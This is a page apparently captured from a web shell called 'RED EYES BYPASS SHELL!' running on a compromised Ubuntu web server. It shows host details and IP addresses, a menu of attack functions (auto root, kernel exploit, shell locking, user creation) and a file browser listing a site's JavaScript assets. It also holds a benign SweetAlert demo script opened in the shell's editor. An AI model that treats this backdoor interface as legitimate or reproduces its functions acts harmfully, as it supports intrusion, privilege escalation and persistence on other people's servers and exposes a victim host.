Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
rdiresearch /
admin /
assets /
assets /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
menu
[ DIR ]
drwxr-xr-x
SmoothScroll.js
19.96
KB
-rwxr-xr-x
animation.js
640
B
-rwxr-xr-x
bootstrap-growl.min.js
5.57
KB
-rwxr-xr-x
classie.js
1.79
KB
-rwxr-xr-x
color-json-common-page.js
0
B
-rwxr-xr-x
common-pages.js
296
B
-rwxr-xr-x
counter.js
2.18
KB
-rwxr-xr-x
demo-box.js
13.51
KB
-rwxr-xr-x
demo-dark-light.js
13.51
KB
-rwxr-xr-x
demo-dark.js
13.51
KB
-rwxr-xr-x
demo-image.js
14.64
KB
-rwxr-xr-x
demo-light-dark.js
13.51
KB
-rwxr-xr-x
horizontal-layout.js
11.25
KB
-rwxr-xr-x
horizontal-layout.min.js
6.5
KB
-rwxr-xr-x
jquery.easypiechart.min.js
3.9
KB
-rwxr-xr-x
jquery.mCustomScrollbar.concat.min.js
44.41
KB
-rwxr-xr-x
jquery.mousewheel.min.js
2.71
KB
-rwxr-xr-x
jquery.quicksearch.js
4.6
KB
-rwxr-xr-x
modal.js
2.75
KB
-rwxr-xr-x
modalEffects.js
1.33
KB
-rwxr-xr-x
owl-custom.js
209
B
-rwxr-xr-x
pcoded.min.js
51
KB
-rwxr-xr-x
rating.js
3.61
KB
-rwxr-xr-x
script.js
17.59
KB
-rwxr-xr-x
script.min.js
11
KB
-rwxr-xr-x
sweetalert.js
16.58
KB
-rwxr-xr-x
swiper-custom.js
705
B
-rwxr-xr-x
vartical-layout.js
13.51
KB
-rwxr-xr-x
vartical-layout.min.js
5.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modal.js
'use strict'; $(document).ready(function () { //Basic alert document.querySelector('.sweet-1').onclick = function(){ swal("Here's a message!", "It's pretty, isn't it?") }; //success message document.querySelector('.alert-success-msg').onclick = function(){ swal("Good job!", "You clicked the button!", "success"); }; //Alert confirm document.querySelector('.alert-confirm').onclick = function(){ swal({ title: "Are you sure?", text: "Your will not be able to recover this imaginary file!", type: "warning", showCancelButton: true, confirmButtonClass: "btn-danger", confirmButtonText: "Yes, delete it!", closeOnConfirm: false }, function(){ swal("Deleted!", "Your imaginary file has been deleted.", "success"); }); }; //Success or cancel alert document.querySelector('.alert-success-cancel').onclick = function(){ swal({ title: "Are you sure?", text: "You will not be able to recover this imaginary file!", type: "warning", showCancelButton: true, confirmButtonClass: "btn-danger", confirmButtonText: "Yes, delete it!", cancelButtonText: "No, cancel plx!", closeOnConfirm: false, closeOnCancel: false }, function(isConfirm) { if (isConfirm) { swal("Deleted!", "Your imaginary file has been deleted.", "success"); } else { swal("Cancelled", "Your imaginary file is safe :)", "error"); } }); }; //prompt alert document.querySelector('.alert-prompt').onclick = function(){ swal({ title: "An input!", text: "Write something interesting:", type: "input", showCancelButton: true, closeOnConfirm: false, inputPlaceholder: "Write something" }, function (inputValue) { if (inputValue === false) return false; if (inputValue === "") { swal.showInputError("You need to write something!"); return false } swal("Nice!", "You wrote: " + inputValue, "success"); }); }; //Ajax alert document.querySelector('.alert-ajax').onclick = function(){ swal({ title: "Ajax request example", text: "Submit to run ajax request", type: "info", showCancelButton: true, closeOnConfirm: false, showLoaderOnConfirm: true }, function () { setTimeout(function () { swal("Ajax request finished!"); }, 2000); }); }; $('#openBtn').on('click',function () { $('#myModal').modal({ show: true }) }); $(document).on('show.bs.modal', '.modal', function (event) { var zIndex = 1040 + (10 * $('.modal:visible').length); $(this).css('z-index', zIndex); setTimeout(function() { $('.modal-backdrop').not('.modal-stack').css('z-index', zIndex - 1).addClass('modal-stack'); }, 0); }); });
Close